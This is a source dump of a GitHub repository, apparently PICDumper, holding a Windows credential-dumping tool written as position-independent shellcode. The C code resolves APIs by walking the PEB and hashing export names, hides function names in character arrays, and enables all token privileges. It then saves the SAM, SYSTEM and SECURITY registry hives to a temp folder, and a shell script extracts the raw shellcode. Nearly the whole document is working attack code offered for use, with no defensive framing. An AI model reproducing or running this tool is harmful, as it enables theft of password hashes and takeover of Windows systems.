├── Makefile ├── README.md ├── addresshunter.h ├── adjuststack.asm ├── adjuststack.o ├── create.sh ├── main.c ├── main.o ├── picdump.bin ├── picdump.exe └── picdumper.png /Makefile: -------------------------------------------------------------------------------- 1 | make: 2 | nasm -f win64 adjuststack.asm -o adjuststack.o 3 | x86_64-w64-mingw32-gcc main.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o main.o -Wl,-Tlinker.ld,--no-seh 4 | x86_64-w64-mingw32-ld -s adjuststack.o main.o -o picdump.exe 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PICDumper 2 | 3 | Dump SAM/SYSTEM/SECURITY hives using position-independent code. 4 | 5 | ![image](picdumper.png) 6 | # Acknowledgments 7 | [@ninjaparanoid](https://twitter.com/ninjaparanoid) - https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 8 | -------------------------------------------------------------------------------- /addresshunter.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define DEREF( name )*(UINT_PTR *)(name) 5 | #define DEREF_64( name )*(DWORD64 *)(name) 6 | #define DEREF_32( name )*(DWORD *)(name) 7 | #define DEREF_16( name )*(WORD *)(name) 8 | #define DEREF_8( name )*(BYTE *)(name) 9 | 10 | #define KERNEL32DLL_HASH 0x6A4ABC5B 11 | #define NTDLLDLL_HASH 0x3CFA685D 12 | #define OBJ_CASE_INSENSITIVE 0x00000040L 13 | 14 | //redefine UNICODE_STRING struct 15 | typedef struct _UNICODE_STR 16 | { 17 | USHORT Length; 18 | USHORT MaximumLength; 19 | PWSTR pBuffer; 20 | } UNICODE_STRING, *PUNICODE_STRING; 21 | typedef struct _OBJECT_ATTRIBUTES { 22 | ULONG Length; 23 | HANDLE RootDirectory; 24 | PUNICODE_STRING ObjectName; 25 | ULONG Attributes; 26 | PVOID SecurityDescriptor; 27 | PVOID SecurityQualityOfService; 28 | } OBJECT_ATTRIBUTES,*POBJECT_ATTRIBUTES; 29 | typedef struct _IO_STATUS_BLOCK { 30 | union { 31 | NTSTATUS Status; 32 | PVOID Pointer; 33 | }; 34 | ULONG_PTR Information; 35 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 36 | //redefine PEB_LDR_DATA struct 37 | typedef struct _PEB_LDR_DATA 38 | { 39 | DWORD dwLength; 40 | DWORD dwInitialized; 41 | LPVOID lpSsHandle; 42 | LIST_ENTRY InLoadOrderModuleList; 43 | LIST_ENTRY InMemoryOrderModuleList; 44 | LIST_ENTRY InInitializationOrderModuleList; 45 | LPVOID lpEntryInProgress; 46 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 47 | 48 | //redefine LDR_DATA_TABLE_ENTRY struct 49 | typedef struct _LDR_DATA_TABLE_ENTRY 50 | { 51 | LIST_ENTRY InMemoryOrderModuleList; 52 | LIST_ENTRY InInitializationOrderModuleList; 53 | PVOID DllBase; 54 | PVOID EntryPoint; 55 | ULONG SizeOfImage; 56 | UNICODE_STRING FullDllName; 57 | UNICODE_STRING BaseDllName; 58 | ULONG Flags; 59 | SHORT LoadCount; 60 | SHORT TlsIndex; 61 | LIST_ENTRY HashTableEntry; 62 | ULONG TimeDateStamp; 63 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 64 | 65 | //redefine PEB_FREE_BLOCK struct 66 | typedef struct _PEB_FREE_BLOCK 67 | { 68 | struct _PEB_FREE_BLOCK * pNext; 69 | DWORD dwSize; 70 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 71 | 72 | //redefine PEB struct 73 | typedef struct __PEB 74 | { 75 | BYTE bInheritedAddressSpace; 76 | BYTE bReadImageFileExecOptions; 77 | BYTE bBeingDebugged; 78 | BYTE bSpareBool; 79 | LPVOID lpMutant; 80 | LPVOID lpImageBaseAddress; 81 | PPEB_LDR_DATA pLdr; 82 | LPVOID lpProcessParameters; 83 | LPVOID lpSubSystemData; 84 | LPVOID lpProcessHeap; 85 | PRTL_CRITICAL_SECTION pFastPebLock; 86 | LPVOID lpFastPebLockRoutine; 87 | LPVOID lpFastPebUnlockRoutine; 88 | DWORD dwEnvironmentUpdateCount; 89 | LPVOID lpKernelCallbackTable; 90 | DWORD dwSystemReserved; 91 | DWORD dwAtlThunkSListPtr32; 92 | PPEB_FREE_BLOCK pFreeList; 93 | DWORD dwTlsExpansionCounter; 94 | LPVOID lpTlsBitmap; 95 | DWORD dwTlsBitmapBits[2]; 96 | LPVOID lpReadOnlySharedMemoryBase; 97 | LPVOID lpReadOnlySharedMemoryHeap; 98 | LPVOID lpReadOnlyStaticServerData; 99 | LPVOID lpAnsiCodePageData; 100 | LPVOID lpOemCodePageData; 101 | LPVOID lpUnicodeCaseTableData; 102 | DWORD dwNumberOfProcessors; 103 | DWORD dwNtGlobalFlag; 104 | LARGE_INTEGER liCriticalSectionTimeout; 105 | DWORD dwHeapSegmentReserve; 106 | DWORD dwHeapSegmentCommit; 107 | DWORD dwHeapDeCommitTotalFreeThreshold; 108 | DWORD dwHeapDeCommitFreeBlockThreshold; 109 | DWORD dwNumberOfHeaps; 110 | DWORD dwMaximumNumberOfHeaps; 111 | LPVOID lpProcessHeaps; 112 | LPVOID lpGdiSharedHandleTable; 113 | LPVOID lpProcessStarterHelper; 114 | DWORD dwGdiDCAttributeList; 115 | LPVOID lpLoaderLock; 116 | DWORD dwOSMajorVersion; 117 | DWORD dwOSMinorVersion; 118 | WORD wOSBuildNumber; 119 | WORD wOSCSDVersion; 120 | DWORD dwOSPlatformId; 121 | DWORD dwImageSubsystem; 122 | DWORD dwImageSubsystemMajorVersion; 123 | DWORD dwImageSubsystemMinorVersion; 124 | DWORD dwImageProcessAffinityMask; 125 | DWORD dwGdiHandleBuffer[34]; 126 | LPVOID lpPostProcessInitRoutine; 127 | LPVOID lpTlsExpansionBitmap; 128 | DWORD dwTlsExpansionBitmapBits[32]; 129 | DWORD dwSessionId; 130 | ULARGE_INTEGER liAppCompatFlags; 131 | ULARGE_INTEGER liAppCompatFlagsUser; 132 | LPVOID lppShimData; 133 | LPVOID lpAppCompatInfo; 134 | UNICODE_STRING usCSDVersion; 135 | LPVOID lpActivationContextData; 136 | LPVOID lpProcessAssemblyStorageMap; 137 | LPVOID lpSystemDefaultActivationContextData; 138 | LPVOID lpSystemAssemblyStorageMap; 139 | DWORD dwMinimumStackCommit; 140 | } _PEB, * _PPEB; 141 | 142 | // main hashing function for ror13 143 | __forceinline DWORD ror13( DWORD d ) 144 | { 145 | return _rotr( d, 13 ); 146 | } 147 | 148 | __forceinline DWORD hash( char * c ) 149 | { 150 | register DWORD h = 0; 151 | do 152 | { 153 | h = ror13( h ); 154 | h += *c; 155 | } while( *++c ); 156 | 157 | return h; 158 | } 159 | 160 | // function to fetch the base address of kernel32.dll from the Process Environment Block 161 | UINT64 GetKernel32() { 162 | ULONG_PTR kernel32dll, val1, val2, val3; 163 | USHORT usCounter; 164 | 165 | // kernel32.dll is at 0x60 offset and __readgsqword is compiler intrinsic, 166 | // so we don't need to extract it's symbol 167 | kernel32dll = __readgsqword( 0x60 ); 168 | 169 | kernel32dll = (ULONG_PTR)((_PPEB)kernel32dll)->pLdr; 170 | val1 = (ULONG_PTR)((PPEB_LDR_DATA)kernel32dll)->InMemoryOrderModuleList.Flink; 171 | while( val1 ) { 172 | val2 = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.pBuffer; 173 | usCounter = ((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.Length; 174 | val3 = 0; 175 | 176 | //calculate the hash of kernel32.dll 177 | do { 178 | val3 = ror13( (DWORD)val3 ); 179 | if( *((BYTE *)val2) >= 'a' ) 180 | val3 += *((BYTE *)val2) - 0x20; 181 | else 182 | val3 += *((BYTE *)val2); 183 | val2++; 184 | } while( --usCounter ); 185 | 186 | // compare the hash kernel32.dll 187 | if( (DWORD)val3 == KERNEL32DLL_HASH ) { 188 | //return kernel32.dll if found 189 | kernel32dll = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)val1)->DllBase; 190 | return kernel32dll; 191 | } 192 | val1 = DEREF( val1 ); 193 | } 194 | return 0; 195 | } 196 | UINT64 GetNtdll() { 197 | ULONG_PTR ntdlldll, val1, val2, val3; 198 | USHORT usCounter; 199 | 200 | 201 | ntdlldll = __readgsqword( 0x60 ); 202 | 203 | ntdlldll = (ULONG_PTR)((_PPEB)ntdlldll)->pLdr; 204 | val1 = (ULONG_PTR)((PPEB_LDR_DATA)ntdlldll)->InMemoryOrderModuleList.Flink; 205 | while( val1 ) { 206 | val2 = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.pBuffer; 207 | usCounter = ((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.Length; 208 | val3 = 0; 209 | 210 | //calculate the hash of ndll.dll 211 | do { 212 | val3 = ror13( (DWORD)val3 ); 213 | if( *((BYTE *)val2) >= 'a' ) 214 | val3 += *((BYTE *)val2) - 0x20; 215 | else 216 | val3 += *((BYTE *)val2); 217 | val2++; 218 | } while( --usCounter ); 219 | 220 | // compare the hash ntdll.dll 221 | if( (DWORD)val3 == NTDLLDLL_HASH ) { 222 | //return ntdll.dll if found 223 | ntdlldll = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)val1)->DllBase; 224 | return ntdlldll; 225 | } 226 | val1 = DEREF( val1 ); 227 | } 228 | return 0; 229 | } 230 | 231 | // custom strcmp function since this function will be called by GetSymbolAddress 232 | // which means we have to call strcmp before loading msvcrt.dll 233 | // so we are writing our own my_strcmp so that we don't have to play with egg or chicken dilemma 234 | int my_strcmp (const char *p1, const char *p2) { 235 | const unsigned char *s1 = (const unsigned char *) p1; 236 | const unsigned char *s2 = (const unsigned char *) p2; 237 | unsigned char c1, c2; 238 | do { 239 | c1 = (unsigned char) *s1++; 240 | c2 = (unsigned char) *s2++; 241 | if (c1 == '\0') { 242 | return c1 - c2; 243 | } 244 | } 245 | while (c1 == c2); 246 | return c1 - c2; 247 | } 248 | 249 | UINT64 GetSymbolAddress( HANDLE hModule, LPCSTR lpProcName ) { 250 | UINT64 dllAddress = (UINT64)hModule, 251 | symbolAddress = 0, 252 | exportedAddressTable = 0, 253 | namePointerTable = 0, 254 | ordinalTable = 0; 255 | 256 | if( hModule == NULL ) { 257 | return 0; 258 | } 259 | 260 | PIMAGE_NT_HEADERS ntHeaders = NULL; 261 | PIMAGE_DATA_DIRECTORY dataDirectory = NULL; 262 | PIMAGE_EXPORT_DIRECTORY exportDirectory = NULL; 263 | 264 | ntHeaders = (PIMAGE_NT_HEADERS)(dllAddress + ((PIMAGE_DOS_HEADER)dllAddress)->e_lfanew); 265 | dataDirectory = (PIMAGE_DATA_DIRECTORY)&ntHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; 266 | exportDirectory = (PIMAGE_EXPORT_DIRECTORY)( dllAddress + dataDirectory->VirtualAddress ); 267 | 268 | exportedAddressTable = ( dllAddress + exportDirectory->AddressOfFunctions ); 269 | namePointerTable = ( dllAddress + exportDirectory->AddressOfNames ); 270 | ordinalTable = ( dllAddress + exportDirectory->AddressOfNameOrdinals ); 271 | 272 | if (((UINT64)lpProcName & 0xFFFF0000 ) == 0x00000000) { 273 | exportedAddressTable += ( ( IMAGE_ORDINAL( (UINT64)lpProcName ) - exportDirectory->Base ) * sizeof(DWORD) ); 274 | symbolAddress = (UINT64)( dllAddress + DEREF_32(exportedAddressTable) ); 275 | } 276 | else { 277 | DWORD dwCounter = exportDirectory->NumberOfNames; 278 | while( dwCounter-- ) { 279 | char * cpExportedFunctionName = (char *)(dllAddress + DEREF_32( namePointerTable )); 280 | if( my_strcmp( cpExportedFunctionName, lpProcName ) == 0 ) { 281 | exportedAddressTable += ( DEREF_16( ordinalTable ) * sizeof(DWORD) ); 282 | symbolAddress = (UINT64)(dllAddress + DEREF_32( exportedAddressTable )); 283 | break; 284 | } 285 | namePointerTable += sizeof(DWORD); 286 | ordinalTable += sizeof(WORD); 287 | } 288 | } 289 | 290 | return symbolAddress; 291 | } 292 | -------------------------------------------------------------------------------- /adjuststack.asm: -------------------------------------------------------------------------------- 1 | extern run 2 | global alignstack 3 | 4 | segment .text 5 | 6 | alignstack: 7 | push rdi ; backup rdi since we will be using this as our main register 8 | mov rdi, rsp ; save stack pointer to rdi 9 | and rsp, byte -0x10 ; align stack with 16 bytes 10 | sub rsp, byte +0x20 ; allocate some space for our C function 11 | call run ; call the C function 12 | mov rsp, rdi ; restore stack pointer 13 | pop rdi ; restore rdi 14 | ret ; return where we left 15 | -------------------------------------------------------------------------------- /adjuststack.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Wh04m1001/PICDumper/eb0953476906e5fb816ac1159fa069fee55e0bac/adjuststack.o -------------------------------------------------------------------------------- /create.sh: -------------------------------------------------------------------------------- 1 | sh=`for i in $(objdump -d picdump.exe |grep "^ " |cut -f2);do echo -n '\x'$i;done` 2 | echo -e $sh > picdump.bin 3 | -------------------------------------------------------------------------------- /main.c: -------------------------------------------------------------------------------- 1 | #include "addresshunter.h" 2 | #include 3 | #include 4 | 5 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); 6 | typedef BOOL(WINAPI* OPENPROCESSTOKEN)(HANDLE, DWORD, PHANDLE); 7 | typedef BOOL(WINAPI* GETTOKENINFORMATION)(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD); 8 | typedef BOOL(WINAPI* ADJUSTTOKENPRIVILEGES)(HANDLE,BOOL,PTOKEN_PRIVILEGES,DWORD,PTOKEN_PRIVILEGES,PDWORD); 9 | typedef NTSTATUS(NTAPI* NTOPENKEYEX)(PHANDLE,ACCESS_MASK,POBJECT_ATTRIBUTES,ULONG); 10 | typedef NTSTATUS(NTAPI* NTSAVEKEYEX)(HANDLE,HANDLE,ULONG); 11 | typedef NTSTATUS(NTAPI* NTCREATEFILE)(PHANDLE,ACCESS_MASK,POBJECT_ATTRIBUTES,PIO_STATUS_BLOCK,PLARGE_INTEGER,ULONG,ULONG,ULONG,ULONG,PVOID,ULONG); 12 | typedef void(WINAPI* RTLINITUNICODESTRING)(PUNICODE_STRING,PCWSTR); 13 | typedef int(WINAPI* WPRINTF)(const wchar_t* format, ...); 14 | typedef void*(WINAPI* MALLOC)(size_t size); 15 | 16 | 17 | BOOL dump(WCHAR* file,WCHAR* key){ 18 | UINT64 ntdll = GetNtdll(); 19 | HANDLE hFile; 20 | HANDLE hKey; 21 | CHAR ntopenkeyex[] = {'N','t','O','p','e','n','K','e','y','E','x',0}; 22 | CHAR rtlinitunicodestring[] = {'R','t','l','I','n','i','t','U','n','i','c','o','d','e','S','t','r','i','n','g',0}; 23 | CHAR ntcreatefile[] = {'N','t','C','r','e','a','t','e','F','i','l','e',0}; 24 | CHAR ntsavekeyex[] = {'N','t','S','a','v','e','K','e','y','E','x',0}; 25 | NTOPENKEYEX myNtOpenKeyEx = (NTOPENKEYEX)GetSymbolAddress((HANDLE)ntdll,ntopenkeyex); 26 | NTSAVEKEYEX myNtSaveKeyEx = (NTSAVEKEYEX)GetSymbolAddress((HANDLE)ntdll,ntsavekeyex); 27 | NTCREATEFILE myNtCreateFile = (NTCREATEFILE)GetSymbolAddress((HANDLE)ntdll,ntcreatefile); 28 | RTLINITUNICODESTRING myRtlInitUnicodeString = (RTLINITUNICODESTRING)GetSymbolAddress((HANDLE)ntdll,rtlinitunicodestring); 29 | UNICODE_STRING ukey; 30 | UNICODE_STRING ufile; 31 | 32 | IO_STATUS_BLOCK io; 33 | myRtlInitUnicodeString(&ukey,key); 34 | myRtlInitUnicodeString(&ufile,file); 35 | OBJECT_ATTRIBUTES oakey = {sizeof(OBJECT_ATTRIBUTES),0x00,&ukey,OBJ_CASE_INSENSITIVE}; 36 | OBJECT_ATTRIBUTES oafile = {sizeof(OBJECT_ATTRIBUTES),0x00,&ufile,OBJ_CASE_INSENSITIVE};; 37 | if(myNtCreateFile(&hFile,FILE_GENERIC_WRITE|FILE_GENERIC_READ,&oafile,&io,NULL,FILE_ATTRIBUTE_NORMAL,FILE_SHARE_WRITE|FILE_SHARE_READ,FILE_OPEN_IF,FILE_OPEN_FOR_BACKUP_INTENT|FILE_SYNCHRONOUS_IO_ALERT,NULL,0) != 0){ 38 | return FALSE; 39 | } 40 | if(myNtOpenKeyEx(&hKey,KEY_ALL_ACCESS,&oakey,REG_OPTION_BACKUP_RESTORE)!= 0){ 41 | return FALSE; 42 | } 43 | if(myNtSaveKeyEx(hKey,hFile,4)!=0){ 44 | return FALSE; 45 | } 46 | 47 | 48 | 49 | return TRUE; 50 | } 51 | 52 | void run(){ 53 | 54 | WCHAR samsuccess[] ={L'S',L'U',L'C',L'C',L'E',L'S',L'S',L'!',L' ',L'S',L'A',L'M',L' ',L'd',L'u',L'm',L'p',L'e',L'd',L' ',L'>',L' ',L'C',L':',L'\\',L'W',L'i',L'n',L'd',L'o',L'w',L's',L'\\',L'T',L'e',L'm',L'p',L'\\',L'S',L'A',L'M',L'.',L'h',L'i',L'v',L'e',L'\n',0}; 55 | WCHAR systemsuccess[] = {L'S',L'U',L'C',L'C',L'E',L'S',L'S',L'!',L' ',L'S',L'Y',L'S',L'T',L'E',L'M',L' ',L'd',L'u',L'm',L'p',L'e',L'd',L' ',L'>',L' ',L'C',L':',L'\\',L'W',L'i',L'n',L'd',L'o',L'w',L's',L'\\',L'T',L'e',L'm',L'p',L'\\',L'S',L'Y',L'S',L'T',L'E',L'M',L'.',L'h',L'i',L'v',L'e','\n',0}; 56 | WCHAR securitysuccess[] = {L'S',L'U',L'C',L'C',L'E',L'S',L'S',L'!',L' ',L'S',L'E',L'C',L'U',L'R',L'I',L'T',L'Y',L' ',L'd',L'u',L'm',L'p',L'e',L'd',L' ',L'>',L' ',L'C',L':',L'\\',L'W',L'i',L'n',L'd',L'o',L'w',L's',L'\\',L'T',L'e',L'm',L'p',L'\\',L'S',L'E',L'C',L'U',L'R',L'I',L'T',L'Y',L'.',L'h',L'i',L'v',L'e','\n',0}; 57 | 58 | WCHAR samsave[] = {L'\\',L'?',L'?',L'\\',L'C',L':',L'\\',L'W',L'i',L'n',L'd',L'o',L'w',L's',L'\\',L'T',L'e',L'm',L'p',L'\\',L'S',L'A',L'M',L'.',L'h',L'i',L'v',L'e',0}; 59 | WCHAR systemsave[] = {L'\\',L'?',L'?',L'\\',L'C',L':',L'\\',L'W',L'i',L'n',L'd',L'o',L'w',L's',L'\\',L'T',L'e',L'm',L'p',L'\\',L'S',L'Y',L'S',L'T',L'E',L'M',L'.',L'h',L'i',L'v',L'e',0}; 60 | WCHAR securitysave[] = {L'\\',L'?',L'?',L'\\',L'C',L':',L'\\',L'W',L'i',L'n',L'd',L'o',L'w',L's',L'\\',L'T',L'e',L'm',L'p',L'\\',L'S',L'E',L'C',L'U',L'R',L'I',L'T',L'Y',L'.',L'h',L'i',L'v',L'e',0}; 61 | WCHAR sam[] = {L'\\',L'R',L'e',L'g',L'i',L's',L't',L'r',L'y',L'\\',L'M',L'a',L'c',L'h',L'i',L'n',L'e',L'\\',L'S',L'A',L'M',0}; 62 | WCHAR system[] = {L'\\',L'R',L'e',L'g',L'i',L's',L't',L'r',L'y',L'\\',L'M',L'a',L'c',L'h',L'i',L'n',L'e',L'\\',L'S',L'Y',L'S',L'T',L'E',L'M',0}; 63 | WCHAR security[] = {L'\\',L'R',L'e',L'g',L'i',L's',L't',L'r',L'y',L'\\',L'M',L'a',L'c',L'h',L'i',L'n',L'e',L'\\',L'S',L'E',L'C',L'U',L'R',L'I',L'T',L'Y',0}; 64 | 65 | CHAR msvcrtdll[] = {'m','s','v','c','r','t','.','d','l','l',0}; 66 | CHAR loadlibrarya[] = {'L','o','a','d','L','i','b','r','a','r','y','A',0}; 67 | CHAR malloc_c[] = {'m','a','l','l','o','c',0}; 68 | CHAR advapi32dll[] = {'a','d','v','a','p','i','3','2','.','d','l','l',0}; 69 | CHAR wprintf_c[] = {'w','p','r','i','n','t','f',0}; 70 | CHAR gettokeninformation[] = {'G','e','t','T','o','k','e','n','I','n','f','o','r','m','a','t','i','o','n',0}; 71 | CHAR adjusttokenprivileges[] = {'A','d','j','u','s','t','T','o','k','e','n','P','r','i','v','i','l','e','g','e','s',0}; 72 | CHAR openprocesstoken[] = {'O','p','e','n','P','r','o','c','e','s','s','T','o','k','e','n',0}; 73 | 74 | 75 | UINT64 k32 = GetKernel32(); 76 | LOADLIBRARYA myLoadLibraryA = (LOADLIBRARYA)GetSymbolAddress((HANDLE)k32, loadlibrarya); 77 | 78 | 79 | UINT64 mscv = (UINT64)myLoadLibraryA(msvcrtdll); 80 | WPRINTF mywprintf = (WPRINTF)GetSymbolAddress((HANDLE)mscv,wprintf_c); 81 | MALLOC mymalloc = (MALLOC)GetSymbolAddress((HANDLE)mscv,malloc_c); 82 | 83 | UINT64 advapi32 = (UINT64)myLoadLibraryA(advapi32dll); 84 | GETTOKENINFORMATION myGetTokenInformation = (GETTOKENINFORMATION)GetSymbolAddress((HANDLE)advapi32,gettokeninformation); 85 | ADJUSTTOKENPRIVILEGES myAdjustTokenPrivileges = (ADJUSTTOKENPRIVILEGES)GetSymbolAddress((HANDLE)advapi32,adjusttokenprivileges); 86 | OPENPROCESSTOKEN myOpenProcessToken = (OPENPROCESSTOKEN)GetSymbolAddress((HANDLE)advapi32,openprocesstoken); 87 | 88 | HANDLE hToken; 89 | DWORD sizeneeded; 90 | PTOKEN_PRIVILEGES privs; 91 | 92 | if(myOpenProcessToken((HANDLE)-1,TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)){ 93 | myGetTokenInformation(hToken,TokenPrivileges,NULL,0,&sizeneeded); 94 | privs = (PTOKEN_PRIVILEGES)mymalloc(sizeneeded); 95 | if(myGetTokenInformation(hToken,TokenPrivileges,privs,sizeneeded,&sizeneeded)){ 96 | for(int i = 0;iPrivilegeCount;i++){ 97 | privs->Privileges[i].Attributes |= SE_PRIVILEGE_ENABLED; 98 | } 99 | if(myAdjustTokenPrivileges(hToken,FALSE,privs,0,NULL,NULL)){ 100 | if(dump(samsave,sam)){ 101 | mywprintf(samsuccess); 102 | if(dump(systemsave,system)){ 103 | mywprintf(systemsuccess);{ 104 | if(dump(securitysave,security)){ 105 | mywprintf(securitysuccess); 106 | } 107 | } 108 | } 109 | } 110 | } 111 | } 112 | } 113 | } -------------------------------------------------------------------------------- /main.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Wh04m1001/PICDumper/eb0953476906e5fb816ac1159fa069fee55e0bac/main.o -------------------------------------------------------------------------------- /picdump.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Wh04m1001/PICDumper/eb0953476906e5fb816ac1159fa069fee55e0bac/picdump.bin -------------------------------------------------------------------------------- /picdump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Wh04m1001/PICDumper/eb0953476906e5fb816ac1159fa069fee55e0bac/picdump.exe -------------------------------------------------------------------------------- /picdumper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Wh04m1001/PICDumper/eb0953476906e5fb816ac1159fa069fee55e0bac/picdumper.png --------------------------------------------------------------------------------